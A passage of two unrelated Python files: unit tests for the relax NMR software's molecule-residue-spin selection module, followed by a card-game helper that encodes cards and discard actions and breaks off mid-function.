# the Free Software Foundation, either version 3 of the License, or #
# (at your option) any later version. #
# #
# This program is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU General Public License for more details. #
# #
# You should have received a copy of the GNU General Public License #
# along with this program. If not, see <http://www.gnu.org/licenses/>. #
# #
###############################################################################
# relax module imports.
from data_store import Relax_data_store; ds = Relax_data_store()
from pipe_control import mol_res_spin, pipes
from pipe_control.reset import reset
from lib.errors import RelaxError, RelaxNoPipeError
from test_suite.unit_tests.base_classes import UnitTestCase
class Test_mol_res_spin(UnitTestCase):
"""Unit tests for the functions of the 'pipe_control.mol_res_spin' module."""
def setUp(self):
"""Set up some molecules, residues, and spins for testing."""
# Add a data pipe to the data store.
ds.add(pipe_name='orig', pipe_type='mf')
# Name the first molecule.
cdp.mol[0].name = 'Ap4Aase'
# Add a second molecule to the system.
cdp.mol.add_item(mol_name='RNA')
# Add two more residues to the first molecule (and set the residue number of the first).
cdp.mol[0].res[0].num = 1
cdp.mol[0].res.add_item(res_num=2, res_name='Glu')
cdp.mol[0].res.add_item(res_num=4, res_name='Pro')
# Add some spin info to this molecule.
cdp.mol[0].res[0].spin[0].name = 'NH'
cdp.mol[0].res[0].spin[0].num = 60
cdp.mol[0].res[1].spin[0].name = 'NH'
cdp.mol[0].res[1].spin[0].num = 63
# Add one more residue to the second molecule (and set the residue number of the first).
cdp.mol[1].res[0].num = -5
cdp.mol[1].res.add_item(res_num=-4)
# Add a second set of spins to the second molecule (naming the first set first).
cdp.mol[1].res[0].spin[0].name = 'C8'
cdp.mol[1].res[1].spin[0].name = 'C8'
cdp.mol[1].res[0].spin.add_item(spin_name='N5')
cdp.mol[1].res[1].spin.add_item(spin_name='N5')
cdp.mol[1].res[1].spin.add_item(spin_name='2H', spin_num=132)
# Deselect a number of spins.
cdp.mol[0].res[0].spin[0].select = 0
cdp.mol[0].res[2].spin[0].select = 0
cdp.mol[1].res[0].spin[0].select = 0
cdp.mol[1].res[1].spin[1].select = 0
# Update the metadata.
mol_res_spin.metadata_update()
def test_count_spins(self):
"""Test that the number of spins can be properly counted.
The function tested is pipe_control.mol_res_spin.count_spins().
"""
# Test the number of spins counted.
self.assertEqual(mol_res_spin.count_spins(), 4)
self.assertEqual(mol_res_spin.count_spins(skip_desel=False), 8)
self.assertEqual(mol_res_spin.count_spins(selection='@N5'), 1)
self.assertEqual(mol_res_spin.count_spins(selection='@N5', skip_desel=False), 2)
def test_count_no_spins(self):
"""Test that the number of spins (zero) can be properly counted.
The function tested is pipe_control.mol_res_spin.count_spins().
"""
# Reset relax.
reset()
# Add a data pipe to the data store.
ds.add(pipe_name='orig', pipe_type='mf')
# Test the number of spins counted.
self.assertEqual(mol_res_spin.count_spins(), 0)
def test_count_spins_no_pipe(self):
"""Test that the counting of the number of spins raises an error when no pipe exists.
The function tested is pipe_control.mol_res_spin.count_spins().
"""
# Reset relax.
reset()
# Test for the error.
self.assertRaises(RelaxNoPipeError, mol_res_spin.count_spins)
def test_exists_mol_res_spin_data(self):
"""Test the function for determining if molecule-residue-spin data exists.
The function tested is pipe_control.mol_res_spin.exists_mol_res_spin_data().
"""
# This should be True.
self.failUnless(mol_res_spin.exists_mol_res_spin_data())
def test_exists_mol_res_spin_data_single_mol(self):
"""Determine if molecule-residue-spin data exists (with data for a single molecule).
The function tested is pipe_control.mol_res_spin.exists_mol_res_spin_data().
"""
# Reset relax.
reset()
# Add a data pipe to the data store.
ds.add(pipe_name='orig', pipe_type='mf')
dp = pipes.get_pipe('orig')
# Name the first molecule.
dp.mol[0].name = 'TOM40'
# This should be True.
self.failUnless(mol_res_spin.exists_mol_res_spin_data())
def test_exists_mol_res_spin_data_single_res_name(self):
"""Determine if molecule-residue-spin data exists (when a single residue is named).
The function tested is pipe_control.mol_res_spin.exists_mol_res_spin_data().
"""
# Reset relax.
reset()
# Add a data pipe to the data store.
ds.add(pipe_name='orig', pipe_type='mf')
dp = pipes.get_pipe('orig')
# Name the first residue.
dp.mol[0].res[0].name = 'Lys'
# This should be True.
self.failUnless(mol_res_spin.exists_mol_res_spin_data())
def test_exists_mol_res_spin_data_single_res_num(self):
"""Determine if molecule-residue-spin data exists (when a single residue is numbered).
The function tested is pipe_control.mol_res_spin.exists_mol_res_spin_data().
"""
# Reset relax.
reset()
# Add a data pipe to the data store.
ds.add(pipe_name='orig', pipe_type='mf')
dp = pipes.get_pipe('orig')
# Number the first residue.
dp.mol[0].res[0].num = 1
# This should be True.
self.failUnless(mol_res_spin.exists_mol_res_spin_data())
def test_exists_mol_res_spin_data_single_spin_name(self):
"""Determine if molecule-residue-spin data exists (when a single spin is named).
The function tested is pipe_control.mol_res_spin.exists_mol_res_spin_data().
"""
# Reset relax.
reset()
# Add a data pipe to the data store.
ds.add(pipe_name='orig', pipe_type='mf')
dp = pipes.get_pipe('orig')
# Name the first spin.
dp.mol[0].res[0].spin[0].name = 'NH'
# This should be True.
self.failUnless(mol_res_spin.exists_mol_res_spin_data())
def test_exists_mol_res_spin_data_single_spin_num(self):
"""Determine if molecule-residue-spin data exists (when a single spin is numbered).
The function tested is pipe_control.mol_res_spin.exists_mol_res_spin_data().
"""
# Reset relax.
reset()
# Add a data pipe to the data store.
ds.add(pipe_name='orig', pipe_type='mf')
dp = pipes.get_pipe('orig')
# Number the first spin.
dp.mol[0].res[0].spin[0].num = 234
# This should be True.
self.failUnless(mol_res_spin.exists_mol_res_spin_data())
def test_exists_mol_res_spin_data_no_data(self):
"""Determine if molecule-residue-spin data exists when no data exists.
The function tested is pipe_control.mol_res_spin.exists_mol_res_spin_data().
"""
# Reset relax.
reset()
# Add a data pipe to the data store.
ds.add(pipe_name='orig', pipe_type='mf')
# This should be False.
self.failIf(mol_res_spin.exists_mol_res_spin_data())
def test_exists_mol_res_spin_data_no_pipe(self):
"""Determine if molecule-residue-spin data exists when no data pipe exists.
The function tested is pipe_control.mol_res_spin.exists_mol_res_spin_data().
"""
# Reset relax.
reset()
# This should fail.
self.assertRaises(RelaxNoPipeError, mol_res_spin.exists_mol_res_spin_data)
def test_format_info_full1(self):
"""Test the format_info_full() function for all combinations of input."""
# The spin info and expected string - covering all possible combinations.
info = [
# 5 bits of info.
{'mol_name': 'Ubi', 'res_name': 'Ala', 'res_num': 10, 'spin_name': 'N', 'spin_num': 200, 'string': "Molecule Ubi, residue Ala 10, spin N 200"},
# 4 bits of info.
{'mol_name': None, 'res_name': 'Ala', 'res_num': 10, 'spin_name': 'N', 'spin_num': 200, 'string': "Residue Ala 10, spin N 200"},
{'mol_name': 'Ubi', 'res_name': None, 'res_num': 10, 'spin_name': 'N', 'spin_num': 200, 'string': "Molecule Ubi, residue 10, spin N 200"},
{'mol_name': 'Ubi', 'res_name': 'Ala', 'res_num': None, 'spin_name': 'N', 'spin_num': 200, 'string': "Molecule Ubi, residue Ala, spin N 200"},
{'mol_name': 'Ubi', 'res_name': 'Ala', 'res_num': 10, 'spin_name': None, 'spin_num': 200, 'string': "Molecule Ubi, residue Ala 10, spin 200"},
{'mol_name': 'Ubi', 'res_name': 'Ala', 'res_num': 10, 'spin_name': 'N', 'spin_num': None, 'string': "Molecule Ubi, residue Ala 10, spin N"},
# 3 bits of info.
{'mol_name': None, 'res_name': None, 'res_num': 10, 'spin_name': 'N', 'spin_num': 200, 'string': "Residue 10, spin N 200"},
{'mol_name': None, 'res_name': 'Ala', 'res_num': None, 'spin_name': 'N', 'spin_num': 200, 'string': "Residue Ala, spin N 200"},
{'mol_name': None, 'res_name': 'Ala', 'res_num': 10, 'spin_name': None, 'spin_num': 200, 'string': "Residue Ala 10, spin 200"},
{'mol_name': None, 'res_name': 'Ala', 'res_num': 10, 'spin_name': 'N', 'spin_num': None, 'string': "Residue Ala 10, spin N"},
{'mol_name': 'Ubi', 'res_name': None, 'res_num': None, 'spin_name': 'N', 'spin_num': 200, 'string': "Molecule Ubi, spin N 200"},
{'mol_name': 'Ubi', 'res_name': None, 'res_num': 10, 'spin_name': None, 'spin_num': 200, 'string': "Molecule Ubi, residue 10, spin 200"},
{'mol_name': 'Ubi', 'res_name': None, 'res_num': 10, 'spin_name': 'N', 'spin_num': None, 'string': "Molecule Ubi, residue 10, spin N"},
{'mol_name': 'Ubi', 'res_name': 'Ala', 'res_num': None, 'spin_name': None, 'spin_num': 200, 'string': "Molecule Ubi, residue Ala, spin 200"},
{'mol_name': 'Ubi', 'res_name': 'Ala', 'res_num': None, 'spin_name': 'N', 'spin_num': None, 'string': "Molecule Ubi, residue Ala, spin N"},
{'mol_name': 'Ubi', 'res_name': 'Ala', 'res_num': 10, 'spin_name': None, 'spin_num': None, 'string': "Molecule Ubi, residue Ala 10"},
# 2 bits of info.
{'mol_name': None, 'res_name': None, 'res_num': None, 'spin_name': 'N', 'spin_num': 200, 'string': "Spin N 200"},
{'mol_name': None, 'res_name': None, 'res_num': 10, 'spin_name': None, 'spin_num': 200, 'string': "Residue 10, spin 200"},
{'mol_name': None, 'res_name': None, 'res_num': 10, 'spin_name': 'N', 'spin_num': None, 'string': "Residue 10, spin N"},
{'mol_name': None, 'res_name': 'Ala', 'res_num': None, 'spin_name': None, 'spin_num': 200, 'string': "Residue Ala, spin 200"},
{'mol_name': None, 'res_name': 'Ala', 'res_num': None, 'spin_name': 'N', 'spin_num': None, 'string': "Residue Ala, spin N"},
{'mol_name': None, 'res_name': 'Ala', 'res_num': 10, 'spin_name': None, 'spin_num': None, 'string': "Residue Ala 10"},
{'mol_name': 'Ubi', 'res_name': None, 'res_num': None, 'spin_name': None, 'spin_num': 200, 'string': "Molecule Ubi, spin 200"},
{'mol_name': 'Ubi', 'res_name': None, 'res_num': None, 'spin_name': 'N', 'spin_num': None, 'string': "Molecule Ubi, spin N"},
{'mol_name': 'Ubi', 'res_name': None, 'res_num': 10, 'spin_name': None, 'spin_num': None, 'string': "Molecule Ubi, residue 10"},
{'mol_name': 'Ubi', 'res_name': 'Ala', 'res_num': None, 'spin_name': None, 'spin_num': None, 'string': "Molecule Ubi, residue Ala"},
# 1 bit of info.
{'mol_name': None, 'res_name': None, 'res_num': None, 'spin_name': None, 'spin_num': 200, 'string': "Spin 200"},
{'mol_name': None, 'res_name': None, 'res_num': None, 'spin_name': 'N', 'spin_num': None, 'string': "Spin N"},
{'mol_name': None, 'res_name': None, 'res_num': 10, 'spin_name': None, 'spin_num': None, 'string': "Residue 10"},
{'mol_name': None, 'res_name': 'Ala', 'res_num': None, 'spin_name': None, 'spin_num': None, 'string': "Residue Ala"},
{'mol_name': 'Ubi', 'res_name': None, 'res_num': None, 'spin_name': None, 'spin_num': None, 'string': "Molecule Ubi"},
# 0 bits of info.
{'mol_name': None, 'res_name': None, 'res_num': None, 'spin_name': None, 'spin_num': None, 'string': ""},
]
# Printout.
print("Checking %s combinations." % len(info))
# Create and check each string.
for i in range(len(info)):
print(" Checking %s" % info[i])
string = mol_res_spin.format_info_full(mol_name=info[i]['mol_name'], res_name=info[i]['res_name'], res_num=info[i]['res_num'], spin_name=info[i]['spin_name'], spin_num=info[i]['spin_num'])
self.assertEqual(string, info[i]['string'])
def test_generate_spin_id_data_array1(self):
"""First test of the spin ID generation function.
The function tested is pipe_control.mol_res_spin.generate_spin_id_data_array().
"""
# The data.
data = ['1', 'GLY']
# The ID.
id = mol_res_spin.generate_spin_id_data_array(data, res_num_col=1, res_name_col=2)
# Test the string.
self.assertEqual(id, ':1')
def test_generate_spin_id_data_array2(self):
"""Second test of the spin ID generation function.
The function tested is pipe_control.mol_res_spin.generate_spin_id_data_array().
"""
# The data.
data = ['1', 'GLY', '234', 'NH']
# The ID.
id = mol_res_spin.generate_spin_id_data_array(data, res_num_col=1, res_name_col=2, spin_num_col=3, spin_name_col=4)
# Test the string.
self.assertEqual(id, ':1@234')
def test_generate_spin_id_data_array3(self):
"""Third test of the spin ID generation function.
The function tested is pipe_control.mol_res_spin.generate_spin_id_data_array().
"""
# The data.
data = ['Ap4Aase', '234', 'NH']
# The ID.
id = mol_res_spin.generate_spin_id_data_array(data, mol_name_col=1, res_num_col=None, res_name_col=None, spin_num_col=2, spin_name_col=3)
# Test the string.
self.assertEqual(id, '#Ap4Aase@234')
def test_generate_spin_id_data_array4(self):
"""Fourth test of the spin ID generation function.
The function tested is pipe_control.mol_res_spin.generate_spin_id_data_array().
"""
# The data.
data = ['Ap4Aase', '1', 'GLY']
# The ID.
id = mol_res_spin.generate_spin_id_data_array(data, mol_name_col=1, res_num_col=2, res_name_col=3)
# Test the string.
self.assertEqual(id, '#Ap4Aase:1')
def test_generate_spin_id_data_array5(self):
"""Fifth test of the spin ID generation function.
The function tested is pipe_control.mol_res_spin.generate_spin_id_data_array().
"""
# The data.
data = ['Ap4Aase', '1', 'GLY', '234', 'NH']
# The ID.
id = mol_res_spin.generate_spin_id_data_array(data, mol_name_col=1, res_num_col=2, res_name_col=3, spin_num_col=4, spin_name_col=5)
# Test the string.
self.assertEqual(id, '#Ap4Aase:1@234')
def test_generate_spin_id_data_array6(self):
"""Sixth test of the spin ID generation function.
The function tested is pipe_control.mol_res_spin.generate_spin_id_data_array().
"""
# The data.
data = ['1', 'GLY', None, None]
# The ID.
id = mol_res_spin.generate_spin_id_data_array(data, res_num_col=1, res_name_col=2)
# Test the string.
self.assertEqual(id, ':1')
def test_molecule_loop(self):
"""Test the proper operation of the molecule loop with molecule selection.
The function tested is pipe_control.mol_res_spin.molecule_loop().
"""
# Loop over the molecules.
for mol in mol_res_spin.molecule_loop('#RNA'):
# Test the molecule name.
self.assertEqual(mol.name, 'RNA')
# Test loop length.
self.assertEqual(len(list(mol_res_spin.molecule_loop('#RNA'))), 1)
def test_molecule_loop_no_data(self):
"""Test the proper operation of the molecule loop when no data is present.
The function tested is pipe_control.mol_res_spin.molecule_loop().
"""
# Reset relax.
reset()
# Add a data pipe to the data store.
ds.add(pipe_name='orig', pipe_type='mf')
# Loop over the molecules.
i = 0
for molecule in mol_res_spin.molecule_loop():
i = i + 1
# Test loop length.
self.assertEqual(i, 0)
def test_molecule_loop_no_pipe(self):
"""Test the proper operation of the molecule loop when no data pipe is present.
The function tested is pipe_control.mol_res_spin.molecule_loop().
"""
# Reset relax.
reset()
# Function for the problem of catching an error in a generator function.
def fail_test():
for molecule in mol_res_spin.molecule_loop():
pass
# Test for the no pipe error.
self.assertRaises(RelaxNoPipeError, fail_test)
def test_molecule_loop_no_selection(self):
"""Test the proper operation of the molecule loop when no selection is present.
The function tested is pipe_control.mol_res_spin.molecule_loop().
"""
# Molecule data.
name = ['Ap4Aase', 'RNA']
# Loop over the molecules.
i = 0
for mol in mol_res_spin.molecule_loop():
# Test the molecule names.
self.assertEqual(mol.name, name[i])
# Increment i.
i = i + 1
# Test loop length.
self.assertEqual(len(list(mol_res_spin.molecule_loop())), 2)
def test_residue_loop(self):
"""Test the proper operation of the residue loop with residue selection.
The function tested is pipe_control.mol_res_spin.residue_loop().
"""
# Loop over the residues.
for res in mol_res_spin.residue_loop('#Ap4Aase:Glu'):
# Test the selection.
self.assertEqual(res.num, 2)
# Test loop length.
self.assertEqual(len(list(mol_res_spin.residue_loop('#Ap4Aase:Glu'))), 1)
def test_residue_loop_no_data(self):
"""Test the proper operation of the residue loop when no data is present.
The function tested is pipe_control.mol_res_spin.residue_loop().
"""
# Reset relax.
reset()
# Add a data pipe to the data store.
ds.add(pipe_name='orig', pipe_type='mf')
# Loop over the residues.
i = 0
for residue in mol_res_spin.residue_loop():
i = i + 1
# Test loop length.
self.assertEqual(i, 0)
def test_residue_loop_no_pipe(self):
"""Test the proper operation of the residue loop when no data pipe is present.
The function tested is pipe_control.mol_res_spin.residue_loop().
"""
# Reset relax.
reset()
# Function for the problem of catching an error in a generator function.
def fail_test():
for residue in mol_res_spin.residue_loop():
pass
# Test for the no pipe error.
self.assertRaises(RelaxNoPipeError, fail_test)
def test_residue_loop_no_selection(self):
"""Test the proper operation of the residue loop when no selection is present.
The function tested is pipe_control.mol_res_spin.residue_loop().
"""
# Spin data.
num = [1, 2, 4, -5, -4]
name = [None, 'Glu', 'Pro', None, None]
# Loop over the residues.
i = 0
for res in mol_res_spin.residue_loop():
# Test the residue numbers.
self.assertEqual(res.num, num[i])
# Test the residue names.
self.assertEqual(res.name, name[i])
# Increment i.
i = i + 1
# Test loop length.
self.assertEqual(i, 5)
def test_return_molecule(self):
"""Test the function for returning the desired molecule data container.
The function tested is pipe_control.mol_res_spin.return_molecule().
"""
# Ask for a few molecules.
mol1 = mol_res_spin.return_molecule('#Ap4Aase')
mol2 = mol_res_spin.return_molecule(selection='#RNA', pipe='orig')
# Test the data of molecule 1.
self.assertEqual(mol1.name, 'Ap4Aase')
# Test the data of molecule 2.
self.assertEqual(mol2.name, 'RNA')
def test_return_molecule_pipe_fail(self):
"""Test the failure of the function for returning the desired molecule data container.
The function tested is pipe_control.mol_res_spin.return_molecule().
"""
# Try to get a molecule from a missing data pipe.
self.assertRaises(RelaxNoPipeError, mol_res_spin.return_molecule, selection='#Ap4Aase', pipe='new')
self.assertRaises(RelaxNoPipeError, mol_res_spin.return_molecule, selection='#RNA', pipe='new')
def test_return_residue(self):
"""Test the function for returning the desired residue data container.
The function tested is pipe_control.mol_res_spin.return_residue().
"""
# Ask for a few residues.
res1 = mol_res_spin.return_residue(':1')
res2 = mol_res_spin.return_residue(selection=':2')
res4 = mol_res_spin.return_residue(selection=':4', pipe='orig')
res5 = mol_res_spin.return_residue(selection='#RNA:-5', pipe='orig')
# Test the data of residue 1.
self.assertEqual(res1.num, 1)
self.assertEqual(res1.name, None)
# Test the data of residue 2.
self.assertEqual(res2.num, 2)
self.assertEqual(res2.name, 'Glu')
# Test the data of residue 4.
self.assertEqual(res4.num, 4)
self.assertEqual(res4.name, 'Pro')
# Test the data of the RNA residue -5.
self.assertEqual(res5.num, -5)
self.assertEqual(res5.name, None)
self.assertEqual(res5.spin[1].name, 'N5')
def test_return_residue_pipe_fail(self):
"""Test the failure of the function for returning the desired residue data container.
The function tested is pipe_control.mol_res_spin.return_residue().
"""
# Try to get a residue from a missing data pipe.
self.assertRaises(RelaxNoPipeError, mol_res_spin.return_residue, selection=':2', pipe='new')
def test_return_single_residue_info(self):
"""Test the function for returning the desired residue data container.
The function tested is pipe_control.mol_res_spin.return_single_residue_info().
"""
# Ask for a few residues.
res1 = mol_res_spin.return_single_residue_info('1')
res2 = mol_res_spin.return_single_residue_info('2,Glu')
res4 = mol_res_spin.return_single_residue_info('Pro,4')
res5 = mol_res_spin.return_single_residue_info('-5')
# Test the data of residue 1.
self.assertEqual(res1, (1, None))
# Test the data of residue 2.
self.assertEqual(res2, (2, 'Glu'))
# Test the data of residue 4.
self.assertEqual(res4, (4, 'Pro'))
# Test the data of the RNA residue -5.
self.assertEqual(res5, (-5, None))
def test_return_single_residue_info_fail(self):
"""Test the failure of the function for returning the desired residue data container.
The function tested is pipe_control.mol_res_spin.return_single_residue_info().
"""
# Ask for a few residues.
self.assertRaises(RelaxError, mol_res_spin.return_single_residue_info, '1,2')
self.assertRaises(RelaxError, mol_res_spin.return_single_residue_info, '1,Glu,Pro')
self.assertRaises(RelaxError, mol_res_spin.return_single_residue_info, '1,2,Glu,Pro')
def test_return_spin(self):
"""Test the function for returning the desired spin data container.
The function tested is pipe_control.mol_res_spin.return_spin().
"""
# Ask for a few spins.
spin1 = mol_res_spin.return_spin('#Ap4Aase:1')
spin2 = mol_res_spin.return_spin(spin_id='#Ap4Aase:2')
spin3 = mol_res_spin.return_spin(spin_id='#Ap4Aase:4', pipe='orig')
spin4 = mol_res_spin.return_spin(spin_id='#RNA:-5@N5', pipe='orig')
spin5 = mol_res_spin.return_spin(spin_id='#RNA:-4@2H', pipe='orig')
# Test the data of spin 1.
self.assertNotEqual(spin1, None)
self.assertEqual(spin1.num, 60)
self.assertEqual(spin1.name, 'NH')
# Test the data of spin 2.
self.assertNotEqual(spin2, None)
self.assertEqual(spin2.num, 63)
self.assertEqual(spin2.name, 'NH')
# Test the data of spin 3.
self.assertNotEqual(spin3, None)
self.assertEqual(spin3.num, None)
self.assertEqual(spin3.name, None)
# Test the data of the RNA res -5, spin N5.
self.assertNotEqual(spin4, None)
self.assertEqual(spin4.num, None)
self.assertEqual(spin4.name, 'N5')
# Test the data of the RNA res -4, spin 2H.
self.assertNotEqual(spin5, None)
self.assertEqual(spin5.num, 132)
self.assertEqual(spin5.name, '2H')
def test_return_spin_pipe_fail(self):
"""Test the failure of the function for returning the desired spin data container.
The function tested is pipe_control.mol_res_spin.return_spin().
"""
# Try to get a spin from a missing data pipe.
self.assertRaises(RelaxNoPipeError, mol_res_spin.return_spin, spin_id=':2', pipe='new')
def test_spin_loop(self):
"""Test the proper operation of the spin loop with spin selection.
The function tested is pipe_control.mol_res_spin.spin_loop().
"""
# Spin data.
select = [1, 0]
# Loop over the spins.
i = 0
for spin in mol_res_spin.spin_loop('@N5'):
# Test the selection.
self.assertEqual(spin.select, select[i])
# Test the spin names.
self.assertEqual(spin.name, 'N5')
# Increment i.
i = i + 1
# Test loop length.
self.assertEqual(i, 2)
def test_spin_loop_boolean_or(self):
"""Test the operation of the spin loop with the selection "#Ap4Aase:Glu | #RNA@C8".
The function tested is pipe_control.mol_res_spin.spin_loop().
"""
# Selection, and spin name and number.
select = [1, 0, 1]
name = ['NH', 'C8', 'C8']
num = [63, None, None]
# Loop over the spins.
i = 0
for spin in mol_res_spin.spin_loop("#Ap4Aase:Glu | #RNA@C8"):
# Test the spin.
self.assertEqual([spin.select, spin.name, spin.num], [select[i], name[i], num[i]])
# Increment i.
i = i + 1
# Test loop length.
self.assertEqual(i, 3)
def test_spin_loop_multiatom(self):
"""Test the proper operation of the spin loop with spin selection '@NH|@N5'.
The function tested is pipe_control.mol_res_spin.spin_loop().
"""
# Spin data.
select = [0, 1, 1, 0]
name = ['NH', 'NH', 'N5', 'N5']
# Loop over the spins.
i = 0
for spin in mol_res_spin.spin_loop('@NH|@N5'):
# Test the selection.
self.assertEqual(spin.select, select[i])
# Test the spin names.
self.assertEqual(spin.name, name[i])
# Increment i.
i = i + 1
# Test loop length.
self.assertEqual(i, 4)
def test_spin_loop_no_data(self):
"""Test the proper operation of the spin loop when no data is present.
The function tested is pipe_control.mol_res_spin.spin_loop().
"""
# Reset relax.
reset()
# Add a data pipe to the data store.
ds.add(pipe_name='orig', pipe_type='mf')
# Loop over the spins.
i = 0
for spin in mol_res_spin.spin_loop():
i = i + 1
# Test loop length.
self.assertEqual(i, 0)
def test_spin_loop_no_pipe(self):
"""Test the proper operation of the spin loop when no data pipe is present.
The function tested is pipe_control.mol_res_spin.spin_loop().
"""
# Reset relax.
reset()
# Function for the problem of catching an error in a generator function.
def fail_test():
for spin in mol_res_spin.spin_loop():
pass
# Test for the no pipe error.
self.assertRaises(RelaxNoPipeError, fail_test)
def test_spin_loop_no_selection(self):
"""Test the proper operation of the spin loop when no selection is present.
The function tested is pipe_control.mol_res_spin.spin_loop().
"""
# Spin data.
select = [0, 1, 0, 0, 1, 1, 0, 1]
name = ['NH', 'NH', None, 'C8', 'N5', 'C8', 'N5', '2H']
# Loop over the spins.
i = 0
for spin in mol_res_spin.spin_loop():
# Test the selection.
self.assertEqual(spin.select, select[i])
# Test the spin names.
self.assertEqual(spin.name, name[i])
# Increment i.
i = i + 1
# Test loop length.
self.assertEqual(i, 8)
def test_spin_loop_single_spin(self):
"""Test the operation of the spin loop with the single spin selection '#Ap4Aase:Glu@63'.
The function tested is pipe_control.mol_res_spin.spin_loop().
"""
# Loop over the spins.
i = 0
for spin in mol_res_spin.spin_loop('#Ap4Aase:Glu@63'):
# Test the selection.
self.assertEqual(spin.select, 1)
# Test the spin name.
self.assertEqual(spin.name, 'NH')
# Test the spin number.
self.assertEqual(spin.num, 63)
# Increment i.
i = i + 1
# Test loop length.
self.assertEqual(i, 1)
def test_spin_loop_wildcard(self):
"""Test the proper operation of the spin loop with wildcard spin selection '@N*'.
The function tested is pipe_control.mol_res_spin.spin_loop().
"""
# Spin data.
select = [0, 1, 1, 0]
name = ['NH', 'NH', 'N5', 'N5']
# Loop over the spins.
i = 0
for spin in mol_res_spin.spin_loop('@N*'):
# Test the selection.
self.assertEqual(spin.select, select[i])
# Test the spin names.
self.assertEqual(spin.name, name[i])
# Increment i.
i = i + 1
# Test loop length.
self.assertEqual(i, 4)
def test_boolean_and_selection(self):
"""Test boolean and in mol-res-spin selections."""
# The selection loop:
sel = list(mol_res_spin.residue_loop("#Ap4Aase:4 & :Pro"))
# Test:
self.assertEqual(len(sel), 1)
for res in sel:
self.assert_(res.name == "Pro" and res.num == 4)
def test_boolean_complex_selection(self):
"""Test complex boolean mol-res-spin selections."""
# The residue selection loop.
sel = list(mol_res_spin.residue_loop("#Ap4Aase:4 & :Pro | #RNA"))
# Residue names and numbers.
names = ['Pro', None, None]
numbers = [4, -5, -4]
# The residues.
self.assertEqual(len(sel), 3)
for i in range(3):
self.assertEqual(sel[i].name, names[i])
self.assertEqual(sel[i].num, numbers[i])
######################################################
# Test disabled until this functionality is enabled. #
######################################################
def fixme_test_boolean_parenthesis_selection(self):
"""Test complex boolean mol-res-spin selections with parenthesis."""
# The selection loop:
sel = list(mol_res_spin.residue_loop("(#Ap4Aase & :Pro) | (#RNA & :-4)"))
# Test:
self.assertEqual(len(sel), 2)
for res in sel:
self.assert_(res.num in [-4, 4])
|
24,127 | 17b14511c297455dbfd4c9c9148c1160f28c8a22 | import numpy as np
from Cards import Card
# Card combination: Use for action decoding
suits = ["Clubs", "Diamonds", "Hearts", "Spades"]
double_combination = [["Clubs", "Diamonds"], ["Clubs", "Hearts"], ["Clubs", "Spades"], ["Diamonds", "Hearts"],
["Diamonds", "Spades"], ["Hearts", "Spades"]]
triple_combination = [["Clubs", "Diamonds", "Hearts"], ["Clubs", "Diamonds", "Spades"], ["Clubs", "Hearts", "Spades"],
["Diamonds", "Hearts", "Spades"]]
# Initialize the one-hot dictionary for cards
card_encoding_dict = {}
num = 0
for s in suits:
for v in ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13']:
card = v+"-"+s
card_encoding_dict[card] = num
num += 1
# encode the two joker
card_encoding_dict['01'] = num
num += 1
card_encoding_dict['02'] = num
def encode_cards(cards_str):
""" Encode cards and save it into plane. """
plane = np.zeros(54, dtype=int)
joker_counter = 0
for card_str in cards_str:
if card_str == '0' and joker_counter == 0:
# handle the first joker situation
joker_counter = 1
index = card_encoding_dict['01']
plane[index] = 1
elif card_str == '0' and joker_counter == 1:
# handle the second joker situation
index = card_encoding_dict['02']
plane[index] = 1
else:
index = card_encoding_dict[card_str]
plane[index] = 1
return plane
def cards_to_str(cards):
""" Encode cards into a list of string """
cards_list = []
for c in cards:
cards_list.append(c.get_str())
return cards_list
def encode_action_discard(play_list):
""" Return action id of the action from the player
returned action id is a integer ranging from 0 to 347
"""
action_id_list = []
for play in play_list:
# encode the cards in plays into individual action id
if len(play) == 0:
action_id_list.append(0)
continue
cards_have_same_value = True
for c in play:
if c.value != play[0].value:
cards_have_same_value = False
action = 0
if len(play) == 1:
# single
if play[0].suit != '':
# remove the option of discardings the Joker
suit_num = suits.index(play[0].suit)
action = suit_num * 13 + play[0].value - 1
action += 1
elif len(play) == 2 and cards_have_same_value:
# double
if play[0].suit != '':
# remove the option of discardings the Joker
suits_temp = [play[0].suit, play[1].suit]
suits_temp.sort()
suit_num = double_combination.index(suits_temp)
action = suit_num * 13 + play[0].value - 1
action += 53
elif len(play) == 3 and cards_have_same_value:
# triple
suits_temp = [play[0].suit, play[1].suit, play[2].suit]
suits_temp.sort()
suit_num = triple_combination.index(suits_temp)
action = suit_num * 13 + play[0].value - 1
action += 131
elif len(play) == 4 and cards_have_same_value:
# quadruple
action = play[0].value - 1
action += 183
elif len(play) == 3:
# straight of 3
suit_num = suits.index(play[0].suit)
action = suit_num * 11 + play[0].value - 1
action += 196
elif len(play) == 4:
# straight of 4
suit_num = suits.index(play[0].suit)
action = suit_num * 10 + play[0].value - 1
action += 240
elif len(play) == 5:
# straight of 5
suit_num = suits.index(play[0].suit)
action = suit_num * 9 + play[0].value - 1
action += 280
elif len(play) == 6:
# straight of 6
suit_num = suits.index(play[0].suit)
action = suit_num * 8 + play[0].value - 1
action += 316
action_id_list.append(action)
return action_id_list
def decode_action_discard(action):
""" Return the cards to be discarded from the action
Action is a integer ranging from 0 to 347
"""
discard = []
# find the cards behind the action number
# 52(single)+78(double)+52(triple)+13(quadruple)+44(staight3)+40(staight4)+36(staight5)+32(6)
# card ranges from 1 to 13, suit ranges from CDHS
if action <= 52:
# single
action -= 1
rank = action % 13 + 1
suit = suits[int(action/13)]
discard = [Card(rank, suit)]
elif action <= 130:
# double
action -= 53
rank = action % 13 + 1
suit1 = double_combination[int(action/13)][0]
suit2 = double_combination[int(action/13)][1]
discard = [Card(rank, suit1), Card(rank, suit2)]
elif action <= 182:
# triple
action -= 131
rank = action % 13 + 1
suit1 = triple_combination[int(action/13)][0]
suit2 = triple_combination[int(action/13)][1]
suit3 = triple_combination[int(action/13)][2]
discard = [Card(rank, suit1), Card(rank, suit2), Card(rank, suit3)]
elif action <= 195:
# quadruple
action -= 183
rank = action + 1
discard = [Card(rank, "Clubs"), Card(rank, "Diamonds"), Card(rank, "Hearts"), Card(rank, "Spades")]
elif action <= 239:
# straight of 3
action -= 196
suit = suits[int(action/11)]
rank = action % 11 + 1
discard = [Card(rank, suit), Card(rank + 1, suit), Card(rank + 2, suit)]
elif action <= 279:
# straight of 4
action -= 240
suit = suits[int(action/10)]
rank = action % 10 + 1
discard = [Card(rank, suit), Card(rank + 1, suit), Card(rank + 2, suit), Card(rank + 3, suit)]
elif action <= 315:
